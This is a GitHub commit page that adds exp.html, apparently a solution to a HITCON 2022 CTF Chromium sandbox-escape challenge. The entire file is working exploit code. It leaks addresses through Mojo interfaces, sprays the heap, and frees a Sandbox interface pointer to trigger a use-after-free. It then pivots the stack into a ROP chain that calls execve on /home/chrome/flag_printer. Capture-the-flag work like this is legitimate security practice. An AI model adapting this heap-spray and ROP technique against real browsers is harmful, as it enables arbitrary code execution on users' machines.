Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit 583ae1b

Browse files
Create exp.html
1 parent 9ea8bc7 commit 583ae1b

File tree

1 file changed

+224
-0
lines changed

1 file changed

+224
-0
lines changed

‎2022/hitcon-2022/sbx/exp.html

Lines changed: 224 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,224 @@
1+
<html>
2+
<body></body>
3+
<script src="mojo_bindings/mojo_bindings.js"></script>
4+
<script src="mojo_bindings/third_party/blink/public/mojom/sandbox/sandbox.mojom.js"></script>
5+
<script src="mojo_bindings/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
6+
<script>
7+
var heap;
8+
var replace_data;
9+
var count = 0;
10+
var blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
11+
var kSandboxServiceSize = 0x820; // maybe increase further
12+
var kSpraySize = 3;
13+
var p = 0;
14+
15+
16+
stringToBytes = string => Array.prototype.map.call(string + "\x00", v => v.charCodeAt(0));
17+
18+
function initHeap(obj_ptr){
19+
console.log("initHeap");
20+
replace_data = new Uint8Array(kSandboxServiceSize+0x800).fill(0x23);
21+
var u64 = new BigInt64Array(replace_data.buffer);
22+
var base_index = 0x800 / 8 ;
23+
u64[base_index + 0] = obj_ptr + 0x18n// - 0x20n; // vtable
24+
u64[base_index + 1] = 0x1337n; // id
25+
u64[base_index + 2] = 0n; // isProcess
26+
u64[base_index + 3] = 0x69696969n;
27+
u64[base_index + (0x800/8)] = 0x773311773311n;
28+
u64[base_index + (0x818/8)] = 0n; // backup
29+
30+
31+
}
32+
33+
34+
35+
36+
var spray_ptrs = [];
37+
var old_sprays = [];
38+
function reinitialize_spray(){
39+
old_sprays.push(spray_ptrs);
40+
spray_ptrs = [];
41+
for(var i = 0; i < kSpraySize; i++){
42+
spray_ptrs[i] = new blink.mojom.SandboxPtr();
43+
Mojo.bindInterface(blink.mojom.Sandbox.name, mojo.makeRequest(spray_ptrs[i]).handle, "context", true);
44+
}
45+
}
46+
47+
48+
function spray(){
49+
//await allocate(replace_data.buffer);
50+
51+
for(var i =0; i < kSpraySize; i++){
52+
spray_ptrs[i].pourSand(replace_data)
53+
}
54+
55+
// console.log("spray!!")
56+
}
57+
58+
function int2bint(arr){
59+
var r = [];
60+
for(var i = 0; i < arr.byteLength; i++)
61+
r.push(BigInt(arr[i]));
62+
return r;
63+
}
64+
65+
async function main(){
66+
var sandbox_ptr = new blink.mojom.SandboxPtr();
67+
68+
Mojo.bindInterface(blink.mojom.Sandbox.name, mojo.makeRequest(sandbox_ptr).handle, "context", true);
69+
70+
71+
72+
var base_addr = BigInt((await sandbox_ptr.getTextAddress()).addr) - 0x627fc20n;
73+
var service_ptr = (await sandbox_ptr.getHeapAddress()).addr;
74+
75+
console.log("base : "+base_addr.toString(16));;
76+
console.log("service ptr : "+service_ptr.toString(16));
77+
var fake_obj_ptr = BigInt(service_ptr) + 0x20n;
78+
console.log("Exploit start");
79+
80+
81+
// init fake sandboximpl
82+
83+
var fake_obj = new Uint8Array(0x800).fill(0xcb);
84+
85+
86+
var u8 = new Uint8Array(fake_obj.buffer);
87+
string = ""
88+
89+
var flag_printer = stringToBytes("/home/chrome/flag_printer");
90+
for(var i = 0; i < flag_printer.length; i++){
91+
u8[0x600-0x11 + i] = flag_printer[i]
92+
}
93+
94+
/* layout
95+
gef➤ x/10gx 0x187400683c00
96+
0x187400683c00: 0x000056158e9ac870 0x0000000000000001
97+
0x187400683c10: 0x1111111111111100 0x1111111111111111
98+
0x187400683c20: 0x1111111111111111 0x1111111111111111
99+
0x187400683c30: 0x1111111111111111 0x1111111111111111
100+
0x187400683c40: 0x1111111111111111 0x1111111111111111
101+
*/
102+
103+
104+
var u64 = new BigUint64Array(fake_obj.buffer);
105+
var idx = 0;
106+
// u64[idx++] = 0x414142424343n;
107+
// u64[idx++] = 0xcbcbcbcbcbcbn;
108+
109+
// TODO fixup base addr
110+
xchg_rax_rsp = base_addr + 0x0000000005c3e9b2n; // : xchg rax, rsp ; ret
111+
pop_rdi_ret = base_addr + 0x00000000038da5adn;
112+
add_rsp_pop_rbp = base_addr + 0x00000000039f45dcn; // : add rsp, 0x40 ; pop rbp ; ret
113+
pop_rsi_ret = base_addr + 0x0000000003a0af9en;
114+
pop_rdx_ret = base_addr + 0x00000000039fbe92n;
115+
pop_rax_ret = base_addr + 0x0000000003897616n;
116+
syscall = base_addr + 0x00000000038787ban;
117+
var dw = new DataView(fake_obj.buffer,0x27);
118+
// rop chain start
119+
// here it points after xchg rax rsp, move stack after the gadget
120+
dw.setBigUint64((idx++ * 8),add_rsp_pop_rbp, true)
121+
dw.setBigUint64((idx++ * 8),0x101010101n, true)
122+
dw.setBigUint64((idx++ * 8),0x101010101n, true)
123+
dw.setBigUint64((idx++ * 8),0x101010101n, true)
124+
125+
// initial rip here
126+
dw.setBigUint64((idx++ * 8),xchg_rax_rsp, true)
127+
128+
// real rop chain here
129+
idx = 0x50 / 8;
130+
// dw.setBigUint64((idx++ * 8),0x101010101n, true)
131+
dw.setBigUint64((idx++ * 8),pop_rax_ret, true)
132+
dw.setBigUint64((idx++ * 8),59n, true) // execve
133+
dw.setBigUint64((idx++ * 8),pop_rdi_ret, true)
134+
dw.setBigUint64((idx++ * 8),fake_obj_ptr - 0x20n + 0x600n, true)
135+
dw.setBigUint64((idx++ * 8),pop_rsi_ret, true)
136+
dw.setBigUint64((idx++ * 8),fake_obj_ptr - 0x20n + 0x700n, true)
137+
dw.setBigUint64((idx++ * 8),pop_rdx_ret, true)
138+
dw.setBigUint64((idx++ * 8),fake_obj_ptr - 0x20n + 0x720n, true)
139+
dw.setBigUint64((idx++ * 8),syscall, true)
140+
dw.setBigUint64((idx++ * 8),0x1010201n, true)
141+
142+
// argvp
143+
dw.setBigUint64((0x700 - 0x27 - 0x11),fake_obj_ptr + 0x600n - 0x20n,true);
144+
dw.setBigUint64((0x700 - 0x27 - 0x11) + 8,0n,true);
145+
146+
// envp
147+
dw.setBigUint64((0x720 - 0x27 - 0x11),0n,true);
148+
149+
// dw.setBigUint64((idx++ * 8),0x101010101n, true)
150+
// dw.setBigUint64((idx++ * 8),0x101010102n, true)
151+
// dw.setBigUint64((idx++ * 8),0x101010103n, true)
152+
// dw.setBigUint64((idx++ * 8),0x101010104n, true)
153+
// dw.setBigUint64((idx++ * 8),0x101010105n, true)
154+
155+
await sandbox_ptr.pourSand(fake_obj);
156+
157+
initHeap(fake_obj_ptr);
158+
var N = 400;
159+
var frames = [];
160+
161+
// allocate RFH
162+
163+
164+
// for (var i = 0; i < N; i++) {
165+
// var frame = allocate_rfh();
166+
// frames.push(frame);
167+
// }
168+
// setTimeout(function(){
169+
// console.log("trigger");
170+
// for (var i = 0; i < N; i++) {
171+
// frames[i].contentWindow.trigger();
172+
// deallocate_rfh(frames[i]);
173+
174+
// }
175+
// console.log("end");
176+
// },1000);
177+
// setTimeout(function() {
178+
// location = '';
179+
// }, 3000);
180+
while (1){
181+
let nogc = [];
182+
async function trigger(){
183+
reinitialize_spray();
184+
const kTriggerCount = 100;
185+
var sbx_ptrs = new Array(kTriggerCount);
186+
var reclaim_inst = new blink.mojom.SandboxPtr();
187+
Mojo.bindInterface(blink.mojom.Sandbox.name, mojo.makeRequest(reclaim_inst).handle, "context", true);
188+
for(var i = 0 ; i < kTriggerCount; i++){
189+
sbx_ptrs[i] = new blink.mojom.SandboxPtr();
190+
Mojo.bindInterface(blink.mojom.Sandbox.name, mojo.makeRequest(sbx_ptrs[i]).handle, "context", true);
191+
192+
}
193+
var del_index = kTriggerCount - 1;
194+
console.log("alloc sbx_ptr @ 0x" + (await sbx_ptrs[del_index].getHeapAddress()).addr.toString(16));
195+
196+
var arr = replace_data
197+
for(var i = 0; i < kTriggerCount; i++){
198+
sbx_ptrs[i].pourSand(arr);
199+
200+
}
201+
// for(var j = kTriggerCount - 1; j >= 0; j--){
202+
203+
// sbx_ptrs[j].ptr.reset();
204+
// spray()
205+
// }
206+
// spray();
207+
sbx_ptrs[del_index].ptr.reset();
208+
spray();
209+
210+
// function sleep(ms) {
211+
// return new Promise(resolve => setTimeout(resolve, ms));
212+
// }
213+
214+
nogc.push(sbx_ptrs)
215+
nogc.push(reclaim_inst)
216+
// await sleep(1000);
217+
218+
}
219+
await trigger();
220+
}
221+
}
222+
main();
223+
</script>
224+
</html>

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /